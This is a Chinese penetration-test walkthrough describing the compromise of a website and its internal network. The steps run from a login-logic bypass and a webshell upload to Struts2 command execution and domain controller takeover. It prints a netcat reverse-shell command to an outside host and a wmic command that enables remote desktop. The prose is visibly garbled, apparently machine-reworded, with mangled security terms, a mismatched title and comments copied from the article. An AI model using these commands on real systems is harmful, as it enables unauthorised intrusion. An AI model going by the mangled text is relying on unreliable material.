nmap端口扫描器
序言
争做美德少年,肺炎疫情期内,坚决贯彻政府部门与企业的规定,无可奈何在家工作的我一如既往的收到了渗入检测的每日任务。
正篇
话不多说,进行。
信息内容收集
规矩,第一步先从信息内容收集刚开始。
对总体目标开展二级域名收集,并沒有发觉二级域名。
扫描仪网站导航文档,就一个后台管理网页登陆,别的一片空白发觉。
以后还开展了nmap端口扫描器,都没有发现什么有使用价值的难题。
没法,只有正脸硬刚了。(PS:反映一下大家钢铁直男的性格特点)
手工制作检测
根据各种漏洞扫描工具都不可以非常好的出示有效的信息内容,只能取出了我的burp,一步一步的去看看。
根据抓包软件发觉,在网址的登录处存有弱密码传送,恰好网址都没有短信验证码体制(即使表层上面有短信验证码,诸位老师傅还要去试着一下短信验证码播放的难题)。
在了解复位登陆密码的状况下,试着暴力行为枚举类型,看一下能否得奖。
提醒登录名不会有,表明今天运气不行啊。
又试着变更网址回应包来绕开网页登陆,也失败了。
不怕困难的我,又刚开始科学研究SQL引入,果然,SQL引入也不会有。
我这爆脾气,沒有领域模型构造系统漏洞、工程爆破不进去、SQL引入沒有……
早已刚开始提前准备滑水了,可是,忽然发觉了一个新情况。
扭转乾坤
因为滑水的姿态较为恰当(实际上信息内容收集的工作中一直就沒有停),发觉登录出错的情况下,网址正下方会有一个照片,根据一个白帽(小辣鸡)比较敏感的味觉,储存在当地之后查询,发觉是一个二维码。
浏览器打开扫一扫二维码,发觉是这一网址的app版。
柳暗花明又一村~~
把app下载出来,对apk文件开展逆向分析。
无可奈何,逆向分析、代码审计这类物品,并并不是我所善于的方位,因此 鼓捣了好长时间都没有結果,因此进军app的登录及其传输数据层面的难题。
走上正轨
根据burp抓app的登录包,并试着改动数据信息,发觉,登录不正确时,登录的回应包数据信息为:
{"code":1}
这里未确定。
这才算是真实的扭转乾坤,app登录处存有业务流程逻辑漏洞,取得成功进到后台管理。
以后便是基本的后台管理系统漏洞发觉了。
在头像照片 处,能够 开展上传文件,检测发觉只在前端开发做限定,根据抓包软件改动,立即绕开,取得成功获得webshell。
reGeog proxifier开展内网渗透
在获得webshell之后,发觉服务器防火墙DMZ地区投射外网地址端口号80,应用基本lcx等反跳专用工具被电脑杀毒软件阻拦,试着webshell提权未果。
一筹莫展之时,想起能够 应用r eGeog proxifier正端口转发使自身进到内部网。
一顿操作以后,取得成功进到内部网。
进到内部网以后,根据信息内容收集,发觉一台内部网服务器存有struts2指令实行系统漏洞。
立即运行命令,nc反跳端口号:
nc -e cmd.exe 1.0.0.1 3389
应用powershell线上抓去当地hash,出现意外发觉该服务器登录过域控服务器,取得成功爬取到域控服务器的登陆密码。
根据域指令查寻域控服务器IP,试着远程桌面连接联接,但域控服务器的远程桌面连接仍未打开。
试着应用指令打开远程桌面连接,但cmd指令被限定,但能够 应用wmic指令。应用misc指令:
wmic / node:%pcname%/ USER:%pcaccount%PATHwin32_terminalservicesetting WHERE(__Class!=“”)CALL SetAllowTSConnections 1
取得成功登录域控服务器。
到此,此次渗入全过程圆满落幕~~
总结
整体而言,此次渗入還是做到了预估的总体目标,尽管全过程跌跌撞撞的,可是還是取得了自身要想的物品。
小结下此次渗入的知识要点:
1.信息内容收集很重要,全线信息内容收集别停
2.仔细很重要,不必忽略捕捉的每一条信息内容
3.确信你可以拿下他~~
文中创作者:酒仙桥六号军队
文中为安全性脉率栏目创作者公布,转截请标明:https://www.secpulse.com/archives/138023.html
相关文章
- 5条评论
- 青迟语酌2022-06-03 22:44:14
- 觉一台内部网服务器存有struts2指令实行系统漏洞。 立即运行命令,nc反跳端口号:nc -e cmd.exe 1.0.0.1 3389 应用powershell线上抓去当地hash,出现意外发觉该服务器登录过域控服务器,取
- 余安十驹2022-06-03 16:46:57
- SetAllowTSConnections 1 取得成功登录域控服务器。 到此,此次渗入全过程圆满落幕~~ 总结 整体而言,此次渗入還是做到了预估的总体目标,尽管全过程跌跌撞撞的,可是還是取得了自身
- 晴枙千仐2022-06-03 20:52:18
- 型构造系统漏洞、工程爆破不进去、SQL引入沒有…… 早已刚开始提前准备滑水了,可是,忽然发觉了一个新情况。 03 扭转乾坤 因为滑水的姿态较为恰当(实际上信息内容收集的工作中一直就沒有停),发觉登录出错的情况下,网址正下方会有一个照片,根据一
- 世味婉绾2022-06-03 21:13:31
- 直就沒有停),发觉登录出错的情况下,网址正下方会有一个照片,根据一个白帽(小辣鸡)比较敏感的味觉,储存在当地之后查询,发觉是一个二维码。 浏览器打开扫一扫二维码,发觉是这
- 北槐北渚2022-06-03 13:50:23
- 的情况下,网址正下方会有一个照片,根据一个白帽(小辣鸡)比较敏感的味觉,储存在当地之后查询,发觉是一个二维码。 浏览器打开扫一扫二维码,发觉是这一网址的app版。 柳暗花明又一村~~ 把app下载出来,对apk文件开展逆向分析。 无可奈何,逆